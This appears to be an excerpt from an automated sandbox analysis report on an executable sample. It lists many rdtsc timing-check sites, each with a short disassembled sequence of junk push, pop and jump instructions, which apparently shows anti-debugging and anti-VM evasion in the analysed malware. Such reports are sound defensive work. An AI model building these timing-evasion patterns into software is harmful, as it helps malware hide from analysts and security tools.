Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90D969 second address: 90D96E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90D96E second address: 90D974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9194A3 second address: 9194A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919EEA second address: 919EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919EEE second address: 919EF8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919EF8 second address: 919F0E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F98351AAB1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919F0E second address: 919F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919F12 second address: 919F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 919F1B second address: 919F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90E85D second address: 90E861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91D551 second address: 91D555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91D555 second address: 91D559 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91CFD1 second address: 91D009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 jmp 00007F9834D75057h 0x0000000c jg 00007F9834D75046h 0x00000012 jmp 00007F9834D7504Bh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007F9834D75046h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91FA98 second address: 91FAB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 924E9D second address: 924EA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 924EA2 second address: 924EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F98351AAB1Dh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F98351AAB16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 924EC5 second address: 924EE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9299AC second address: 9299B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9299B2 second address: 9299F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F9834D75050h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F9834D75046h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 jbe 00007F9834D75048h 0x0000001d jc 00007F9834D7504Eh 0x00000023 jl 00007F9834D75046h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9299F1 second address: 929A07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F98351AAB20h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 92C69F second address: 92C6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 92C6A3 second address: 92C6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 92C6A9 second address: 92C6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 92C6B3 second address: 92C6F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB26h 0x00000007 jmp 00007F98351AAB24h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F98351AAB1Fh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 931025 second address: 931039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9834D7504Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 931039 second address: 93103D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93103D second address: 93105B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9834D75052h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9354E9 second address: 9354EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9012E6 second address: 9012FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9834D7504Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9012FC second address: 901348 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F98351AAB18h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov edx, dword ptr [ebp+122D3B4Fh] 0x0000002b lea eax, dword ptr [ebp+12487095h] 0x00000031 nop 0x00000032 push edi 0x00000033 push eax 0x00000034 push edx 0x00000035 ja 00007F98351AAB16h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901348 second address: 90135D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F9834D75046h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90F779 second address: 90F795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901937 second address: 901945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901945 second address: 90195C instructions: 0x00000000 rdtsc 0x00000002 js 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F98351AAB16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90195C second address: 901960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901960 second address: 901966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901A3F second address: 901A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 901D4E second address: 901D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 91084D second address: 910869 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9834D7504Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90226D second address: 902271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 902271 second address: 902277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 911745 second address: 911749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 902277 second address: 90227D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 90227D second address: 902281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 902575 second address: 9025BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jc 00007F9834D75046h 0x0000000f jmp 00007F9834D75051h 0x00000014 popad 0x00000015 pop edx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jc 00007F9834D7504Eh 0x00000020 push ecx 0x00000021 jbe 00007F9834D75046h 0x00000027 pop ecx 0x00000028 mov eax, dword ptr [eax] 0x0000002a jmp 00007F9834D7504Bh 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9025BF second address: 9025C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 902624 second address: 90262A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 902708 second address: 90270E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 934825 second address: 93484B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Dh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9834D75053h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9349C6 second address: 9349CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9349CA second address: 9349D4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9349D4 second address: 9349F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB24h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 934B65 second address: 934B78 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F9834D7504Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 934F4B second address: 934F5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F98351AAB1Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 934F5F second address: 934F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F9834D75046h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93AFB3 second address: 93AFB9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93AFB9 second address: 93AFDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F9834D7508Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9834D7504Ch 0x00000017 jno 00007F9834D75046h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93AFDD second address: 93AFF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F98351AAB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F98351AAB1Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93AFF8 second address: 93AFFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 939B3F second address: 939B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93A3C5 second address: 93A3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9834D7504Eh 0x0000000a jnc 00007F9834D75046h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93A3D7 second address: 93A430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB21h 0x00000007 pushad 0x00000008 jmp 00007F98351AAB1Fh 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F98351AAB1Eh 0x00000014 jmp 00007F98351AAB23h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f jmp 00007F98351AAB1Ch 0x00000024 pop esi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93A430 second address: 93A435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93A987 second address: 93A9B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F98351AAB25h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F98351AAB1Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93A9B1 second address: 93A9D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9834D75056h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 93A9D5 second address: 93AA03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F98351AAB26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F98351AAB22h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9396BE second address: 9396D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9834D75057h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 940481 second address: 94048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94048A second address: 940490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 940490 second address: 94049A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F98351AAB16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94049A second address: 9404A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 940A3B second address: 940A4B instructions: 0x00000000 rdtsc 0x00000002 je 00007F98351AAB1Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 940A4B second address: 940A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 940A51 second address: 940A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 940A55 second address: 940A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 940BC0 second address: 940BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98351AAB28h 0x00000009 je 00007F98351AAB16h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94016B second address: 94016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94016F second address: 94018F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F98351AAB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F98351AAB20h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94018F second address: 940193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 940193 second address: 9401A3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F98351AAB16h 0x00000008 jne 00007F98351AAB16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9401A3 second address: 9401C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007F9834D75046h 0x0000000d jmp 00007F9834D7504Fh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 941072 second address: 941094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007F98351AAB2Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9414CF second address: 9414D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9414D5 second address: 9414DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 944C27 second address: 944C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F9834D75057h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jbe 00007F9834D75046h 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 944EF9 second address: 944F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F98351AAB1Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 944F09 second address: 944F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 jmp 00007F9834D75053h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9834D75053h 0x00000014 jmp 00007F9834D75051h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 947438 second address: 94744C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F98351AAB16h 0x0000000e jc 00007F98351AAB16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94C9E9 second address: 94C9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94C0FE second address: 94C131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F98351AAB4Fh 0x0000000b jmp 00007F98351AAB27h 0x00000010 pushad 0x00000011 jmp 00007F98351AAB1Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94C6BD second address: 94C6C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94C6C6 second address: 94C704 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F98351AAB22h 0x00000008 jns 00007F98351AAB16h 0x0000000e jne 00007F98351AAB16h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F98351AAB20h 0x0000001e jmp 00007F98351AAB25h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94C704 second address: 94C708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 94FBFC second address: 94FC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
